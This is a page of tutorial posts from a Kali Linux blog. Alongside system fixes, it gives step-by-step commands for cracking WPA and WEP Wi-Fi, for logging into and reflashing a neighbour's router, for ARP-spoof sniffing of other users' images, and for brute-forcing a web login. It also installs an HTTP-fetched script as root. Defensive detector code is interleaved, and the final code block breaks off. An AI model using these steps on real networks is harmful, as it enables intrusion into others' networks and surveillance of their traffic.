Showing posts with label Kali Linux. Show all posts

Friday, November 13, 2015

'apt-add-repository' command not found Debian / Ubuntu [Solution]

Written by Pranshu Bajpai | LinkedIn

You might have encountered certain non-standard packages that have no installation candidates in your current repositories. In such cases, you can try adding a new repository. However, you might then hit an error that says: 'apt-add-repository: command not found'. The system has no binary called 'apt-add-repository' anywhere in its PATH, which is why the shell reports that it cannot find the command.

Here's the fix.

Execute the following commands in your terminal (the script is fetched over plain HTTP and ends up root-owned in /usr/sbin, so read it before you move it into place):

$wget http://blog.anantshri.info/content/uploads/2010/09/add-apt-repository.sh.txt
$mv add-apt-repository.sh.txt /usr/sbin/add-apt-repository
$chmod o+x /usr/sbin/add-apt-repository
$chown root:root /usr/sbin/add-apt-repository

(Thanks to the author of this script!)

If you are not using a 'root' account, add 'sudo' in front of each of these commands before executing them.

Now try adding the new repository again. For example:

$add-apt-repository ppa:webupd8team/sublime-text-2
$apt-get update

(the repository you are trying to add might be different in your case)


You should now be able to add new repositories to your system and install non-standard packages.



Please let me know in the comments below if you come across any issues.

Tuesday, March 10, 2015

/var/log Disk Space Issues | Ubuntu, Kali, Debian Linux | /var/log Fills Up Fast

Written by Pranshu Bajpai | LinkedIn

Recently, I started noticing that my computer kept running out of space for no reason at all. I mean, I hadn't downloaded any large files and my root drive should not have been having any space issues, and yet my computer kept telling me that I had '0' bytes available or free on my /root/ drive. As I found it hard to believe, I invoked the 'df' command (for disk space usage):
#df

So clearly, 100% of the disk partition was in use, and '0' was available to me. Next, I checked whether the system had simply run out of 'inodes' to assign to new files; this can happen if there are a lot of small files of '0' bytes or so on your machine.
#df -i

Only 11% of inodes were in use, so this was clearly not a problem of running out of inodes. This was completely baffling. The first thing to do was to locate the cause of the problem. Computers never lie. If the machine tells me that I am running out of space on the root drive then there must be some files that I do not know about; most likely these are some 'system' files created during routine operations.

To locate the cause of the problem, I executed the following command to find all files of size greater than ~2GB:
# find / -size +2000M

Clearly, the folder '/var/log' needs my attention. It seems some kernel log files are humongous in size and have not been 'rotated' (explained later). So, I listed the contents of this directory arranged in order of decreasing size:
#ls -s -S /var/log

That one log file 'messages.1' was 12 GB in size and the next two were 5.5 GB. So this is what had been eating up my space. The first thing I did was run 'logrotate':
#/etc/cron.daily/logrotate
It ran for a while as it rotated the logs. logrotate is meant to automate the task of administering log files on systems that generate a heavy amount of logs. It is responsible for compressing, rotating, and delivering log files. Read more about it here.

What I hoped by running logrotate was that it would rotate and compress the old log files so I could quickly remove those from my system. Why didn't I just delete the '/var/log' directory directly? Because that would break things. '/var/log' is needed by the system and the system expects to see it. Deleting it is a bad idea. So, I needed to ensure that I didn't delete anything of significance.

After a while, logrotate completed execution and I was able to see some '.gz' compressed files in this directory. I quickly removed (or deleted) these.

Still, there were two files of around 5 GB: messages.1 and kern.log.1. Since these had already been rotated, I figured it would be safe to remove these as well. But instead of doing an 'rm' to remove them, I decided to just empty them (in case they were being used somewhere):
#> messages.1
#> kern.log.1

The size of both of these was reduced to '0' bytes. Great! Freed up a lot of disk space this way and nothing 'broken' in the process.

How did the log files become so large over such a small time period?


This is killing me. Normally, log files should not reach these kinds of sizes if logrotate is doing its job properly or if everything is running right. I am still interested in knowing how the log files got so huge in the first place. It is probably some service, application or process creating a lot of errors, maybe? Maybe logrotate is not able to execute under 'cron' jobs? I don't know. Before 'emptying' these log files I did take a look inside them to find repetitive patterns. But then I quickly gave up on reading 5 GB files as I was short on time.

Since this is my personal laptop that I shut down at night, as opposed to a server that is up all the time, I have installed 'anacron' and will set 'logrotate' to run under 'anacron' instead of cron. I did this since I have my suspicions that cron is not executing logrotate daily. We will see what the results are.

I will update this post when I have discovered the root cause of this problem.
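Added example, not from the original post, for the triage step the author ran out of time for: rather than reading a 5 GB file by hand, stream it once and count normalized line templates (timestamps, hex values and digit runs masked), which usually names the flooding service directly, and list every file under a directory that exceeds a size threshold, the programmatic form of the `find / -size +2000M` step. The sample log lines are constructed for the demo; on a real box run `top_templates_in_file('/var/log/messages.1')` or `oversized('/var/log', 2 * 1024 ** 3)`.

```python
import os
import re
from collections import Counter
from typing import Iterable, List, Tuple

# Masks applied in order: syslog timestamp prefix, then hex literals, then digit runs.
_SYSLOG_TS = re.compile(r"^[A-Z][a-z]{2} +\d{1,2} \d{2}:\d{2}:\d{2} ")
_HEX = re.compile(r"\b0x[0-9a-fA-F]+\b")
_NUM = re.compile(r"\d+")


def normalize(line: str) -> str:
    """Collapse one log line into a template so that repeats group together."""
    line = _SYSLOG_TS.sub("", line.rstrip("\n"))
    line = _HEX.sub("HEX", line)
    return _NUM.sub("N", line)


def top_templates(lines: Iterable[str], n: int = 5) -> List[Tuple[str, int]]:
    """Most frequent templates with their counts, consuming the input once."""
    counts = Counter(normalize(line) for line in lines if line.strip())
    return counts.most_common(n)


def top_templates_in_file(path: str, n: int = 5) -> List[Tuple[str, int]]:
    """Same thing over a file of any size: it is streamed, never loaded whole."""
    with open(path, "r", errors="replace") as fh:
        return top_templates(fh, n)


def oversized(directory: str, threshold_bytes: int) -> List[Tuple[str, int]]:
    """Regular files under directory larger than threshold, biggest first."""
    hits = []
    for root, _dirs, files in os.walk(directory):
        for name in files:
            path = os.path.join(root, name)
            try:
                size = os.path.getsize(path)
            except OSError:  # vanished or unreadable: skip it, do not abort
                continue
            if size > threshold_bytes:
                hits.append((path, size))
    return sorted(hits, key=lambda item: item[1], reverse=True)


# Constructed sample: a USB device that keeps failing enumeration floods kern.log.
SAMPLE_LOG = """\
Mar 10 09:12:01 kali kernel: [ 1234.567890] usb 1-1: device descriptor read/64, error -71
Mar 10 09:12:01 kali kernel: [ 1234.702300] usb 1-1: device descriptor read/64, error -71
Mar 10 09:12:02 kali kernel: [ 1235.011000] usb 1-1: device descriptor read/64, error -71
Mar 10 09:12:02 kali kernel: [ 1235.211000] usb 1-1: new full-speed USB device number 7 using xhci_hcd
Mar 10 09:12:03 kali kernel: [ 1235.900000] usb 1-1: device descriptor read/64, error -71
Mar 10 09:12:05 kali anacron[812]: Job `cron.daily' started
"""

if __name__ == "__main__":
    for template, count in top_templates(SAMPLE_LOG.splitlines(), 3):
        print(f"{count:>8}  {template}")
    for path, size in oversized("/var/log", 2 * 1024 ** 3):
        print(f"{size / 1024 ** 3:6.1f} GiB  {path}")
```

The template counts tell you which unit to fix (or whose logging to throttle) before you touch logrotate; emptying the file only buys time until the same process fills it again.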

Thursday, February 5, 2015

Multiple Screens in (Kali) Linux | How To

Written by Pranshu Bajpai | LinkedIn

I have felt the need for multiple screens several times simply because of the many tabs and terminal windows I keep open on my box. Hence, to avoid constantly switching between these, I decided to bring in multiple screens. You might have felt the same--especially if you work on multiple applications simultaneously. Some people use these multiple screens while playing games as well.

Before I brought in new screens, I wanted to get a 'feel' of using them, and decide whether this is something I would be comfortable with while working. Fortunately, I had an old LG 17'' CRT monitor lying around which I used for testing this set up of multiple screens. Here, the operating system I am using is Kali Linux (Debian 7 wheezy) but the process is fairly straightforward and would work for any Linux (or Windows) box.

How to set up multiple screens on (Kali) Linux

Firstly, you need to make the hardware connection, that is, connect the other screen's display cable to your machine. In my case, I connected the old CRT monitor's VGA cable to my HP laptop.

You need to locate the 'Display' panel to set up the initial configuration. This should not be hard to do. On a Debian or Kali Linux box, this would be under 'Applications' --> 'System Tools' --> 'Preferences' --> 'System Settings' --> 'Displays'



The location of 'Displays' could vary according to your Linux distro, however, again, it should not be hard to locate. Once inside, you will see that your OS has detected the two displays. Uncheck 'Mirror displays'. By default, your laptop's screen is the primary display and would be on the left. You can drag and change this so that the laptop's display is on the right--as I have done here.


How to set the primary display screen

By default, your laptop's screen is your primary display. This means that the top panel, containing 'Applications' and 'Places', and the bottom panel, tracking open windows and tabs, would be available on the laptop's screen only. I wanted to change this so that my CRT monitor's screen was the primary screen. To do so, I edited the monitors.xml file in Linux.

Locate 'monitors.xml' in '/home/.config/monitors.xml' or '/root/.config/monitors.xml'. Now, edit it in a text editor so that you modify the line containing '<primary>yes/no</primary>'.


In my case, I have modified the xml file so that the part corresponding to my laptop's screen says '<primary>no</primary>', and the part corresponding to the CRT monitor says '<primary>yes</primary>'.

Now, the CRT monitor is the primary screen and 'Applications', 'Places' etc. show up there. After all the setup, this is what it looks like on my box:


Note that this is the extended display corresponding to both the screens, that is, half of this shows up on one screen and half on the other. This is a picture of my set up:


Note: The Guake terminal (yellow font) has been configured to show up on both the screens. For this, I edited the '/usr/bin/guake' and changed the width from '100' to '200'.

So far, I am pleased with this multiple screen set up as it offers me a lot more work space, but it will take a little getting used to.
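Added example, not from the original post: the same monitors.xml edit done with a script, so that exactly one output ends up with `<primary>yes</primary>` and the previous file is kept as a backup. The element layout (monitors/configuration/output/primary) follows the version-1 file GNOME 3 writes; the output names LVDS1 and VGA1 and the sample document are constructed, so substitute the names your own file contains.

```python
import shutil
import xml.etree.ElementTree as ET
from typing import Dict

# Constructed sample in the version="1" layout GNOME 3 used for monitors.xml:
# laptop panel LVDS1 is primary and sits to the right of the external VGA1 monitor.
SAMPLE_MONITORS_XML = """<monitors version="1">
  <configuration>
    <clone>no</clone>
    <output name="LVDS1">
      <width>1366</width>
      <height>768</height>
      <x>1024</x>
      <y>0</y>
      <primary>yes</primary>
    </output>
    <output name="VGA1">
      <width>1024</width>
      <height>768</height>
      <x>0</x>
      <y>0</y>
      <primary>no</primary>
    </output>
  </configuration>
</monitors>
"""


def primary_map(xml_text: str) -> Dict[str, str]:
    """Which output is primary, e.g. {'LVDS1': 'yes', 'VGA1': 'no'}."""
    root = ET.fromstring(xml_text)
    return {out.get("name"): (out.findtext("primary") or "no")
            for out in root.findall("./configuration/output")}


def set_primary(xml_text: str, primary_name: str) -> str:
    """Return the document with exactly one <primary>yes</primary>, on primary_name."""
    root = ET.fromstring(xml_text)
    outputs = root.findall("./configuration/output")
    names = [out.get("name") for out in outputs]
    if primary_name not in names:
        raise ValueError(f"no output named {primary_name!r}; configured outputs: {names}")
    for out in outputs:
        flag = out.find("primary")
        if flag is None:  # some files omit the element; add it rather than skip the output
            flag = ET.SubElement(out, "primary")
        flag.text = "yes" if out.get("name") == primary_name else "no"
    return ET.tostring(root, encoding="unicode")


def set_primary_in_file(path: str, primary_name: str) -> None:
    """Edit the real file, keeping a .bak copy so a typo cannot leave you without a primary."""
    shutil.copy2(path, path + ".bak")
    with open(path, "r", encoding="utf-8") as fh:
        updated = set_primary(fh.read(), primary_name)
    with open(path, "w", encoding="utf-8") as fh:
        fh.write(updated)


if __name__ == "__main__":
    print(primary_map(set_primary(SAMPLE_MONITORS_XML, "VGA1")))
```

Call `set_primary_in_file("/root/.config/monitors.xml", "VGA1")` (or the path under your own home directory) and log out and back in for the panels to move.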

Sunday, December 21, 2014

How to Use Truecrypt | Truecrypt Tutorial [Screenshots] | Kali Linux, BackTrack, BackBox, Windows

Written by Pranshu Bajpai | LinkedIn

Data protection is crucial. The importance of privacy--especially concerning sensitive documents--cannot be overstated, and if you’re here, you have already taken the first step towards securing it.

Truecrypt is one of the best encryption tools out there. It’s free and available for Windows and Linux. It comes pre-installed in Kali Linux and Backtrack. I first came across the tool when I was reading ‘Kingpin’ (The infamous hacker Max Butler was using it to encrypt data that could be used as evidence against him).

Here is how you can set up Truecrypt for use in Kali Linux (similar procedures will work in other Linux distros and Windows).

Go to Applications -> Accessories -> Truecrypt

Truecrypt main window opens up. As this is the first time we are using Truecrypt we need to set up a volume for our use.

Click ‘Create Volume’ and the Truecrypt volume creation wizard opens up:


Click on ‘create an encrypted file container’

This container will contain your encrypted files. The files can be of any type, as long as they lie in this container, they will be encrypted after ‘dismounting the volume’.

Now the next screen asks if you want to create a Standard or Hidden Volume. In case of hidden volume, no one would really know that it is there so they can’t ‘force’ you to provide its password.

For now we will just create a ‘Standard’ volume.



On the next screen you will be asked for the ‘location’ of this volume. This can be any drive on your computer. This is where your container will lie. The container can be seen at this location but it won’t have any ‘extension’ and will have the name that you provide it during this setup.

Choose any ‘location’ on your computer for the container and carry on to the next step.

A password is now required for this volume. This is the ‘password’ which will be used to decrypt the volume while ‘mounting’ it. Needless to say, it should be strong as a weak password defeats the whole purpose of security/encryption.


Next click on ‘Format’ and the volume creation would begin. You will be shown a progress bar and it will take some time depending on how big your volume size is.



Once ‘Formatting’ is completed, your volume is ready to be used. You can place files in there (drag and drop works). Once done, ‘Dismount’ this volume and exit Truecrypt.

When you want to access the encrypted files in the container, fire up Truecrypt and click on any of the ‘Slots’ on the main window.

Now go to ‘Mount’ and point to the location of the container which you selected while setting up the volume.

It will then prompt you for the password.


If you provide the correct password, you’ll see that the volume is mounted on the ‘Slot’ that you selected. If you double-click that ‘Slot’, a new explorer window opens where you can see your decrypted files and work with them. You can add more files to the container if you want.

After you’re done, ‘Dismount’ the volume and exit Truecrypt.

Friday, February 7, 2014

How To Recover Grub After Installing Windows | Ubuntu / Kali / Debian Linux

Written by Pranshu Bajpai | LinkedIn

A Little Rant


It's 2014 and Windows still assumes that it's the only OS out there.

When you install Windows and then install Linux, in the grub boot menu you would find Windows properly accounted for. Grub recognizes Windows and creates an entry for it in the Boot Menu.

Should we assume Microsoft likes bullying (since there's no apparent technical reason why they won't make a Windows boot-loader that would recognize and make an entry for Linux in the Boot menu)?

So if you have Linux and then you try to install Windows, its nasty boot manager would remove the Linux entry and all you will see at boot time is Windows and no entry for Linux.

Kali Linux is the primary OS that I use on my laptop. I rarely ever use Windows so I removed it altogether. However, I was developing an app for Windows and needed to code in the Windows SDK (Visual Studio), since I needed some libraries like 'wlanapi' that weren't present in Linux IDEs.

Long story short, I installed Windows on top of Kali and as I expected, it removed the entry to Kali from the boot menu.

Here are a few commands that I used to solve this issue. This is by far the easiest way to bring the Linux / Ubuntu / Kali boot entry back.

How To Recover Grub (Kali Linux Boot Menu Entry) After Installing Windows

For this you need:

1. Ubuntu (or any Linux) Live CD / USB
2. Eyes to read and fingers to type some commands

Step 1. Boot from the Ubuntu / Kali / Fedora (any linux) live disk OR USB

Step 2. After the 'Live CD Desktop' loads up, Find Terminal.

Step 3. After the Terminal comes up. Type the following commands:

#sudo mount /dev/sda10 /mnt 

#Note that here, for me, the root ( / ) of my Kali Linux was on device '/dev/sda10'. For you this would be different and you should check this out under 'Disk Manager' in your Live CD. You are looking for the partition number of your main partition.

#for i in /sys /proc /run /dev; do sudo mount --bind "$i" "/mnt$i"; done

#sudo chroot /mnt

#update-grub

#grub-install /dev/sda

#update-grub


Step 4. That's it. Exit the Terminal and reboot.

You should now see Grub restored. This is one of the ways in which you can easily and quickly restore grub after installing Windows.

Note that sometimes you may lose the entry for your Windows OS after these steps. But all you need to do is run these 3 commands to get it back:

#apt-get install os-prober

#os-prober

#update-grub

 

Update

 

I recently lost Linux grub again after installing Windows 7 on my laptop and this time I decided to try an ISO called 'boot-repair disk'. I had heard of this a lot and it seems to be the tool of choice for people who don't want to get their hands dirty using the Linux terminal.

The tool is pretty good in that it does what it is meant for, without any glitches. This is all you have to do:

1. Download 'boot-repair disk' ISO
2. Burn it to a CD or make a bootable Pendrive
3. Boot into the boot-repair disk ISO

After that, it is all automated. As soon as you boot into this live disk, it will automatically begin mounting all your file systems and looking for grub. Once it is located, it will be restored automatically and at the end a message will be displayed to you.

So if you are someone who isn't all that thrilled about typing commands on a Linux terminal in the method I discussed previously, this ISO is for you.

References:
AskUbuntu.com

Thursday, December 19, 2013

WPA / WPA2 Handshake Cracking WITH Dictionary using Aircrack-ng | How To | Wireless Hacking

Written by Pranshu Bajpai | LinkedIn

If you are planning to hack your nearest WPA/WPA2 network (with No WPS), I have two words for you: Good. Luck.

In all my experiments with penetration testing, I have found dictionary attacks on WPA/WPA2 handshakes to be the most annoying and futile exercises. This is because:
  • going through each word in a dictionary file containing millions of words is time-consuming.
  • success is not guaranteed (the passphrase may not be present in your dictionary).
During my experiments in India, the WiFi passphrases are usually a combination of Hindi and English words or a Hindu name which are, of course, not present in any dictionary that I download no matter how exhaustive it promises to be.

If you are still brave enough to try a dictionary attack on WPA handshake, here's the procedure.

UPDATE: I have also posted a video on how to capture and crack a WPA handshake on my YouTube channel.



How to launch a Dictionary Attack on WPA Handshake

You might get lucky and your nearest WiFi password may be based on a common dictionary word or number sequence. In such a case, you may succeed with a dictionary attack.

Step 1: Enable monitor mode on wireless interface
#airmon-ng start wlan0
This will start the monitor mode.

Step 2: Take note of the nearest WiFi networks.
#airodump-ng mon0
Step 3: Take note of the channel of your target network, dump packets from that channel and save them to a local capture file.
#airodump-ng -c6 mon0 -w capture_file
Step 4: Wait for WPA handshake capture

At this point, you can use 'aireplay-ng' to de-authenticate an associated legitimate client from the network. The point is that the client will re-authenticate shortly, so we capture the handshake without having to wait too long:
#aireplay-ng --deauth 0 -a <AP_MAC> -c <CLIENT_MAC> mon0
If you don't know the MAC of any associated client, simply 'broadcast' a 'deauth' to all clients:
#aireplay-ng --deauth 0 -a <AP_MAC> mon0


Step 5: After you grab a WPA handshake comes the hard part of brute forcing using a dictionary. Use 'aircrack-ng' for this:
#aircrack-ng capture_file-01.cap -w /media/Pranshu/...../dic/dark0de.lst



Now say your prayers and hope the passphrase is present in the dictionary you chose.
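Added example, not from the original post, to put numbers on why the dictionary run is so slow and why the passphrase and SSID matter. WPA/WPA2-PSK stretches the passphrase into the 256-bit PMK with PBKDF2-HMAC-SHA1, 4096 iterations, salted with the SSID (IEEE 802.11i), so every candidate word costs 4096 HMAC rounds and a non-default SSID defeats any precomputed table. This is the standard's key derivation and nothing more: no capture, no handshake, no MIC check. The word list is constructed, and the "password"/"IEEE" value asserted in the test is the vector published in the 802.11 standard.

```python
import hashlib
import time
from typing import Iterable


def wpa_pmk(passphrase: str, ssid: str) -> bytes:
    """Derive the Pairwise Master Key exactly as a WPA2-PSK supplicant does (IEEE 802.11i)."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA passphrases are 8 to 63 ASCII characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("ascii"), ssid.encode("utf-8"), 4096, 32)


def guesses_per_second(ssid: str, sample: Iterable[str]) -> float:
    """Time the derivation over a small sample of candidates (one core, plain hashlib)."""
    words = list(sample)
    start = time.perf_counter()
    for word in words:
        wpa_pmk(word, ssid)
    elapsed = time.perf_counter() - start
    return len(words) / elapsed if elapsed > 0 else float("inf")


def estimated_hours(wordlist_size: int, rate: float) -> float:
    """Worst-case wall time to try the whole list at the measured rate."""
    return wordlist_size / rate / 3600


# Constructed candidates; real lists are millions of entries.
SAMPLE_WORDS = [f"password{i:03d}" for i in range(50)]

if __name__ == "__main__":
    rate = guesses_per_second("dlink", SAMPLE_WORDS)
    print(f"{rate:,.0f} PMK derivations per second on this core")
    print(f"a 14-million-word list would take ~{estimated_hours(14_000_000, rate):,.1f} h here")
```

The rate you measure is the budget the attacker works against: GPUs raise it by orders of magnitude, but the per-guess cost never drops below 4096 HMAC rounds, which is why a long passphrase that is not in any list, behind a unique SSID, keeps the arithmetic on the defender's side.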



You can also use an online distributed WPA/WPA2 handshake cracking tool on this website:

Note that if the Access Point has WPS Enabled, it becomes easier to recover the WPA / WPA2 passphrase as there are only 11,000 possible combinations needed to brute force the WPS PIN due to an implementation flaw.

Disclaimer: This is for experimentation or authorized penetration testing purposes only.

Wednesday, December 11, 2013

Hacking Neighbour's Wifi (Password) | Hacking Neighbor's Wireless (Internet) | Step by Step How To

Written by Pranshu Bajpai | LinkedIn

Disclaimer: For educational purposes only: This is meant merely to exhibit the dangers of using Poor wireless security. Please note that prior to beginning the test you should seek explicit consent from the owner if the access point does not belong to you.

Hacking into a Neighbor's Wifi access point

OS: Kali Linux
Test Subject: Neighbor's WiFi Access Point
Encryption: WEP

I noticed 4 wireless Access Points in the vicinity. 3 of these were using WPA / WPA2 and I was in no mood for a dictionary attack on WPA handshake, since it takes a long time and success isn't guaranteed. I found one access point using WEP Security and as you know it is an outdated protocol with poor security.

I tested penetrating this WEP access point using the same Aircrack-ng Suite of tools as I have mentioned in this previous post.

Step 1: Discovered the WEP AP having SSID 'dlink'  (Notice the weak signal power from neighbor's house to mine)




Step 2: Collected the required number of Data Packets from the WEP Network. Meanwhile, I used 'aireplay-ng --arpreplay' to increase the data rate since I am not a Patient soul.



Step 3: Saved the data packets in a file called 'neighbor-01.cap' and cracked the password using 'Aircrack-ng'


The Key for the Neighbor's Wifi turned out to be: "1234567890"   -    (An easily guessable Password, just what I expected from someone using WEP Security in 2014)

Step 4: I connected to the wifi using the decrypted key; it allocated an IP to me using DHCP (192.168.0.102)



Note: If you want a better step by step on how to hack a WiFi, check out my previous post here.

5: I was connected to the Internet.

6: Since I was part of their network now, curiosity got the better of me and I decided to scan the network and see who else is connected. I found 3 devices in the network:

One was my Laptop
Another one was my cellphone (I connected my cellphone to the network earlier)
And third was the Dlink router itself (192.168.0.1)
None of the neighbor's own devices were connected to the network at the time.

nmap told me that the dlink router had an open port 80, which reminded me to check out the control panel of this dlink device.

Step 7: So I fired up my browser and went to '192.168.0.1:80' which opened the login panel for dlink access point control panel



Step 8: A quick Google search revealed that the login defaults on dlink devices are:
username: 'admin' and password: blank
Step 9: I tried logging in with the defaults and got access to the control panel.




(Again BAD security practice: leaving defaults unchanged!)




Step 10: I was getting weak power from the AP and decided to upgrade their firmware and see if it made a difference.

The Current firmware of the neighbor's wifi was '5.10'

I checked for latest Firmware available. It was '5.13'



I downloaded the upgrade on my machine ("DIR********.bin")

Step 11: I made a backup of the configuration of the Access point before upgrading. I saved backup 'config.bin' to my laptop from the neighbor's wifi

Step 12: I went ahead and upgraded the Firmware. I uploaded the DIR****.bin from my laptop to the access point and it went for a reboot.



I lost access to the WiFi after the upgrade.

I figured the new upgraded firmware changed the Password for the WiFi now and I couldn't connect to it anymore. Moreover, since I lost access to the Internet now along with the WiFi, I couldn't Google the default password for the upgraded firmware anymore.

And I couldn't crack it either because this time no one--not even the neighbor himself--would be able to authenticate to the WiFi with the new unknown password after the firmware upgrade and hence no data packets would be generated and I will have nothing to crack.

Step: I fired up 'Airodump-ng' again and noticed that the firmware upgrade had simply changed the access point security to "open", i.e., no password is required to connect to it.

Step: I connected to the "Open" wifi and restored the Configuration settings using the 'config.bin' backup I made earlier.

I manually selected WPA2 security and provided the same password as used earlier by my neighbor ("1234567890")

Disclaimer: Please note that I had explicit consent from the owner before commencing this test. If you do not have such permission, please try it on your own access point. Failing to do so will result in illicit activities.


Thursday, October 17, 2013

Driftnet Tutorial | How to Sniff Images with Driftnet + Arpspoof / Ettercap | Kali Linux / Backtrack

Written by Pranshu Bajpai | LinkedIn

If you're on a shared LAN and you are curious to know what kind of images people are searching for over the web on your Local LAN, you can use Driftnet.

For a penetration tester, there's no direct point of doing this, but since I tested this, I thought I might as well make a post about it. As a network administrator who is enforcing a policy on what kind of images are being searched on the local network, this might come in handy to see what images people are viewing at any time.

How to Sniff Images using Driftnet | ARP Spoofing with Arpspoof or Ettercap in Kali Linux

If you are learning, it is better to use Arpspoof to do the spoofing since it's a manual command line tool and if you set up the man in the middle attack in this manner, it will aid your learning.

1. Enable IP forwarding
#echo 1 > /proc/sys/net/ipv4/ip_forward
2. Use Arpspoof on the desired interface [eth0] to spoof local switch's MAC to your own for a particular Victim IP in the network [see Figure below]



Victim machines now think you are the switch, hence all packets destined for the switch arrive on your machine.

3. Use Arpspoof to spoof the victim's MAC to your own for the switch on the network.



Traffic from switch destined to the victim's IP now arrives on your machine.

You are now acting as the "man in the middle"

4. Fire up driftnet. If you've done it all right, you should see the images




Looks like someone's hunting for a new dress.
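Added example, not from the original post: the defender's view of the ARP spoof set up in steps 2 and 3. It tracks the IP-to-MAC bindings seen in ARP replies (a constructed list of observations here) with the gateway's real MAC pinned from a trusted record, and raises an alert when an IP, the gateway's in particular, is suddenly claimed by a different MAC, which is precisely what arpspoof's forged replies do. A second check lists MACs that claim more than one IP, the state the attacker's NIC ends up in after both sides are poisoned. Addresses are constructed; feeding it live ARP traffic from a packet capture is left to the reader.

```python
from typing import Dict, Iterable, List, Tuple

Observation = Tuple[str, str]  # (sender IP, sender MAC) taken from an ARP reply


class ArpWatch:
    """Track IP->MAC bindings seen on the wire and flag rebinding."""

    def __init__(self, gateway_ip: str, gateway_mac: str) -> None:
        self.gateway_ip = gateway_ip
        # The gateway's MAC is pinned from a trusted source (recorded at setup time),
        # so a spoofed reply can never overwrite it, only trigger an alert.
        self.table: Dict[str, str] = {gateway_ip: gateway_mac.lower()}
        self.alerts: List[str] = []

    def observe(self, ip: str, mac: str) -> None:
        mac = mac.lower()
        known = self.table.get(ip)
        if known is None:
            self.table[ip] = mac  # first sighting of this IP: learn it
        elif known != mac:
            if ip == self.gateway_ip:
                self.alerts.append(f"GATEWAY {ip} claimed by {mac} (pinned {known})")
            else:
                self.alerts.append(f"host {ip} moved {known} -> {mac}")
                self.table[ip] = mac  # follow the change so the same reply is not re-alerted

    def duplicate_macs(self) -> Dict[str, List[str]]:
        """MACs that currently claim more than one IP: the spoofing NIC claims its own
        address plus the victim's (the gateway stays pinned to its real MAC)."""
        by_mac: Dict[str, List[str]] = {}
        for ip, mac in self.table.items():
            by_mac.setdefault(mac, []).append(ip)
        return {mac: ips for mac, ips in by_mac.items() if len(ips) > 1}


def run(observations: Iterable[Observation], gateway_ip: str, gateway_mac: str) -> ArpWatch:
    watch = ArpWatch(gateway_ip, gateway_mac)
    for ip, mac in observations:
        watch.observe(ip, mac)
    return watch


# Constructed ARP replies: normal traffic, then the two arpspoof directions from .13.
SAMPLE_REPLIES: List[Observation] = [
    ("192.168.1.1", "00:11:22:33:44:01"),   # gateway, as expected
    ("192.168.1.10", "00:11:22:33:44:10"),  # victim workstation
    ("192.168.1.13", "00:11:22:33:44:13"),  # the host that will start spoofing
    ("192.168.1.1", "00:11:22:33:44:13"),   # "gateway is at .13's MAC" -> victim poisoned
    ("192.168.1.10", "00:11:22:33:44:13"),  # "victim is at .13's MAC" -> gateway poisoned
]

if __name__ == "__main__":
    watch = run(SAMPLE_REPLIES, "192.168.1.1", "00:11:22:33:44:01")
    print("\n".join(watch.alerts))
    print("MACs claiming several IPs:", watch.duplicate_macs())
```

The same two conditions (gateway MAC changed; one MAC behind several IPs) are what arpwatch-style tools and switch dynamic ARP inspection key on, which is why the attack in this post is loud on any monitored LAN.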

Using Ettercap to perform the ARP Spoof


This is a GUI tool, and ARP Spoofing using Ettercap is simply point and click a few times. There are several tutorials on it on the web, so I am not covering that. But the concept is the same Man in the Middle Attack.


Wednesday, October 9, 2013

Web Applications Authentication Brute Force | Practical Demo [Screenshots] | Brute Force Website Login | How To

Written by Pranshu Bajpai | Google+ | LinkedIn

This post is meant to elucidate web application brute forcing by providing a practical demo.

Read up on Authentication Brute Force here.

OWASP testing guide is your friend in Web Application Hacking.

How To Brute Force Website Login | Web Application Hacking Example | Authentication Brute Force


We have a 'Test' website running on 172.19.17.120. I have created a Test account on it with username 'pranshu' and password 'p'. (As we are playing the part of a penetration tester, during the test we will assume we do not know the password)

It has a login form requiring a 'username' and 'password'. HTTP POST Request Parameters are used.

Set up Burpsuite Proxy to intercept traffic between your browser and the server page you will be trying to brute force [Read up on Burpsuite]



Then send these to Burpsuite 'Intruder' to be attacked.

The attack we will use is 'Cluster Bomb'

The highlighted parameters in the image above are the ones which will be bruteforced.

In case you already know 'username', "un-highlight" it, meaning Brute Force Password only. Since I already know the username is 'pranshu', I will try to brute force the password and set username as 'pranshu'



Payload type is a 'simple list' of characters 'a,b,c,d....z'  [which we will use as possible passwords]

Execute the attack. It will set the username to 'pranshu' and go through the 'simple list', trying every letter as the password. All will receive HTTP code 200 (OK)






Except one where the payload was set to 'p'. It received HTTP code 302 (Redirect)

If you know HTTP codes you know that 302 (Redirect) means that the webpage is trying to send us to another page. As a penetration tester, I would guess that the re-direction is occurring because of successful login (redirect to 'Home' page or something)

To verify this, I 'render' the 'response' in Burp suite and sure enough I see I am logged in as user 'pranshu'.

In this case, I have used BurpSuite but you can use 'Brutus' or 'Hydra' for such online brute force password cracking.
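Added example, not from the original post: the server-side counterpart of the Intruder run above. It walks web-server access log lines in the common Apache format (constructed here), treats a POST to the login URL that comes back 200 as a failed attempt and a 302 as a success, exactly the distinction the post uses to spot the hit, and flags any source IP that crosses a failure threshold inside a sliding window, then again if that IP goes on to succeed. The login path, threshold and window are assumptions to tune per application.

```python
import re
from collections import defaultdict, deque
from datetime import datetime
from typing import Deque, Dict, List, Optional

# Apache/nginx "combined" format; only the fields the detector needs are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"
LOGIN_PATH = "/login.php"      # assumption: the form's POST target


def parse(line: str) -> Optional[dict]:
    m = LOG_RE.match(line)
    if not m:
        return None
    return {"ip": m["ip"], "ts": datetime.strptime(m["ts"], TS_FMT),
            "method": m["method"], "path": m["path"], "status": int(m["status"])}


def detect(lines, threshold: int = 10, window_s: int = 60) -> List[str]:
    """Alert once per IP that reaches `threshold` failed logins inside `window_s`,
    and again if such an IP then succeeds (a 302 after a run of 200s)."""
    recent: Dict[str, Deque[datetime]] = defaultdict(deque)
    flagged = set()
    alerts: List[str] = []
    for line in lines:
        rec = parse(line)
        if rec is None or rec["method"] != "POST" or rec["path"] != LOGIN_PATH:
            continue
        ip, ts = rec["ip"], rec["ts"]
        if rec["status"] == 302:             # this app redirects on success
            if ip in flagged:
                alerts.append(f"{ip}: login succeeded after {len(recent[ip])} failures")
            continue
        if rec["status"] != 200:             # this app re-renders the form on failure
            continue
        q = recent[ip]
        q.append(ts)
        while (ts - q[0]).total_seconds() > window_s:
            q.popleft()
        if len(q) >= threshold and ip not in flagged:
            flagged.add(ip)
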